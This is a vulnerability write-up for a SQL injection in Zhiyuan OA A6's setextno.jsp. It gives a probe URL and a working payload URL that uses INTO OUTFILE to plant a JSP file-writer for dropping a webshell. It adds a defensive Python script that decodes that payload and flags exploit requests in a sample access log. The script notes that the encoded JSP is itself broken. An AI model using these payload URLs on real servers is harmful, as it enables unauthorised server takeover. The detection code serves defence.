Zhiyuan OA A6 setextno.jsp SQL injection vulnerability
Vulnerability Description
The user_ids parameter of setextno.jsp in Zhiyuan OA A6 is vulnerable to SQL injection: a UNION query can be appended to the value and its result is returned in the page. The payload below relies on MySQL's SELECT ... INTO OUTFILE to write a JSP file under the web root through the same injection point, which gives the attacker control of the server. The file write only succeeds if the database account holds the FILE privilege and secure_file_priv does not block the target directory.
Vulnerability Impact
Zhiyuan OA A6
Network mapping
Vulnerability reproduction
Request the following URL. The user_ids value is closed with a parenthesis and a UNION query is appended; if the response contains c4ca4238a0b923820dcc509a6f75849b (the MD5 of the string 1), the injection works and the third column is echoed back. The trailing # comments out the remainder of the original query; when the request is sent from a browser or with curl it must be URL-encoded as %23, otherwise the client treats it as a fragment and it never reaches the server.
/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#
Determine the absolute path of the web root. The file write in the next step needs it; in this write-up it is the Tomcat webapps directory of the installation, D:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/.
Write a file through the injection and use it to upload a webshell. The third column of the UNION becomes a subquery that selects unhex(...) INTO OUTFILE, so MySQL writes the decoded bytes to test_upload.jsp under the web root. The hex decodes to a one-line JSP that, when requested with parameters f (file name) and t (content), writes t into the file f under the application's real path; this file writer is then used to drop a full webshell.
https://xxx.xxx.xxx/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(select unhex('3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E') into outfile 'D:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp'),4#
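As an added example (not part of the original write-up), the Python below decodes the unhex('...') argument of the URL above to show exactly what is written to test_upload.jsp, and classifies requests in an access log into the md5(1) probe, the INTO OUTFILE write, and later use of the dropped file. The vulnerable path, the user_ids parameter and the hex string are taken from the write-up; the log lines, client addresses and the "f"/"t" dropper heuristic are constructed assumptions for illustration.

```python
"""Added example (not from the original write-up): decode the hex payload in the
INTO OUTFILE URL and flag the request shapes it documents in an access log.
Every log line below is constructed; the vulnerable path, the user_ids parameter
and the hex string are taken from the write-up."""
import hashlib
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hex copied from the unhex('...') argument, split at the boundaries of the
# Java tokens it encodes so the structure of the dropped JSP is visible.
PAYLOAD_HEX = (
    "3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29"  # <%if(request.getParameter("f")!=null)
    "286E6577206A6176612E696F2E46696C654F757470757453747265616D"                # (new java.io.FileOutputStream
    "286170706C69636174696F6E2E6765745265616C5061746828225C2229"                # (application.getRealPath("\")
    "2B726571756573742E676574506172616D65746572282266222929292E777269746528"    # +request.getParameter("f"))).write(
    "726571756573742E676574506172616D657465722822742229"                        # request.getParameter("t")
    "2E67657442797465732829293B253E"                                            # .getBytes());%>
)

VULN_PATH = "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp"

# MySQL's md5(1) hashes the string "1"; this is the marker the probe URL expects.
MD5_MARKER = hashlib.md5(b"1").hexdigest()

# A UNION ... SELECT inside the user_ids value. \b also accepts union/**/all
# spacing because "/" is not a word character; IGNORECASE covers mixed case.
UNION_RE = re.compile(r"user_ids=[^&]*\bunion\b[^&]*\bselect\b", re.IGNORECASE)

# Parameter names read by the decoded JSP: f = target file name, t = content.
DROPPER_PARAMS = {"f", "t"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')


def decode_unhex_payload(hex_string: str) -> str:
    """Return the text MySQL's unhex() produces, i.e. the bytes written to test_upload.jsp."""
    return bytes.fromhex(hex_string).decode("ascii")


def classify_request(raw_path: str) -> str:
    """Classify a logged (still URL-encoded) request target as 'probe' (UNION with
    md5(...), the first URL), 'outfile' (UNION with INTO OUTFILE/DUMPFILE, the
    second URL), 'union' (any other UNION in user_ids) or 'clean'."""
    parts = urlsplit(raw_path)
    query = unquote(parts.query)
    if unquote(parts.path) != VULN_PATH or not UNION_RE.search(query):
        return "clean"
    lowered = query.lower()
    if "into outfile" in lowered or "into dumpfile" in lowered:
        return "outfile"
    if "md5(" in lowered:
        return "probe"
    return "union"


def looks_like_dropper_use(raw_path: str) -> bool:
    """Heuristic (an assumption, not from the write-up): a .jsp under /yyoa/
    requested with both parameters the decoded payload reads."""
    parts = urlsplit(raw_path)
    path = unquote(parts.path)
    if not path.startswith("/yyoa/") or not path.lower().endswith(".jsp"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    return DROPPER_PARAMS <= set(params)


def scan_access_log(text: str) -> list:
    """Return (client_ip, verdict, request_target) for each non-clean line of a
    combined-format access log."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("path")
        verdict = classify_request(target)
        if verdict == "clean" and looks_like_dropper_use(target):
            verdict = "dropper"
        if verdict != "clean":
            findings.append((line.split(" ", 1)[0], verdict, target))
    return findings


# Constructed log lines (addresses from RFC 5737 documentation ranges). The
# server logs the request target URL-encoded, so spaces are %20 and # is %23.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [12/Mar/2024:09:14:02 +0800] "GET ' + VULN_PATH
    + '?user_ids=(99999)%20union%20all%20select%201,2,(md5(1)),4%23 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [12/Mar/2024:09:14:40 +0800] "GET ' + VULN_PATH
    + "?user_ids=(99999)%20union%20all%20select%201,2,(select%20unhex('" + PAYLOAD_HEX
    + "')%20into%20outfile%20'D:/Program%20Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp'),4%23"
    + ' HTTP/1.1" 200 1490',
    '203.0.113.5 - - [12/Mar/2024:09:15:03 +0800] "GET /yyoa/test_upload.jsp?f=x.jsp&t=test HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Mar/2024:09:16:11 +0800] "GET ' + VULN_PATH + '?user_ids=(1024) HTTP/1.1" 200 412',
])

if __name__ == "__main__":
    print(decode_unhex_payload(PAYLOAD_HEX))
    for ip, verdict, target in scan_access_log(SAMPLE_LOG):
        print(f"{ip:>15}  {verdict:<8} {target[:80]}")
```

Running the block prints the decoded JSP and three findings for 203.0.113.5 (probe, outfile, dropper); the plain user_ids=(1024) request from 198.51.100.7 is left alone. One caveat surfaces when reading the decoded text: the bytes 5C 22 decode to `\"`, so the Java source contains `getRealPath("\")`, where the single backslash escapes the closing quote and leaves the string literal unterminated; the JSP exactly as hex-encoded in the write-up would not compile. The intended text was presumably `getRealPath("\\")`, but that is an inference, not something the page states.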
This post is licensed under CC BY 4.0 by the author.